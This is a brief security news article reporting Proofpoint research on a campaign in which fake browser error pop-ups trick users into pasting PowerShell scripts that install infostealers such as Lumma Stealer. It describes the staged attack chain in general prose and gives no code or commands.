Fake Error Pop-Up Makes Users Infect Themselves with Malware

image provided by pixabay

This post is also available in: עברית (Hebrew)

A new social engineering attack method uses “copy-paste” technique to trick victims – hackers make a forged error message on Chrome with instructions “to install root certificate,” but then leads to the installation of infostealers or other malware.

Proofpoint researchers explain that the campaign usually begins via spam attacks or web browser injects – users receive a popup textbox that suggests an error occurred when trying to open a document or webpage with instructions to copy and paste a “fix” script into a Windows PowerShell terminal, when in reality the users run malicious scripts that infect their computers.

The researchers also reportedly observed various threat actors delivering malware such as DarkGate, Matanbuchus, NetSupport, and various information stealers. “Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk,” said the Proofpoint report.

According to Cybernews, when the script is activated, it flushes the DNS cache, removes clipboard content, and displays a decoy message to the user while downloading another remote PowerShell script to execute, which is a downloader for yet another script that checks if the machine is not virtual and then continues to the final, fourth script to download and execute the actual malware.

One frequently used payload is Lumma Stealer, which targets crypto wallets, steals and exfiltrates user information and session tokens. Many attackers have been using Lumma to download other malicious payloads used to mine and steal cryptocurrencies and perform other nefarious tasks.

The researchers from Proofpoint describe TA571 as a spam distributor that sends high-volume email campaigns to deliver and install a variety of malware for its cybercriminal customers. “The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains,” they conclude.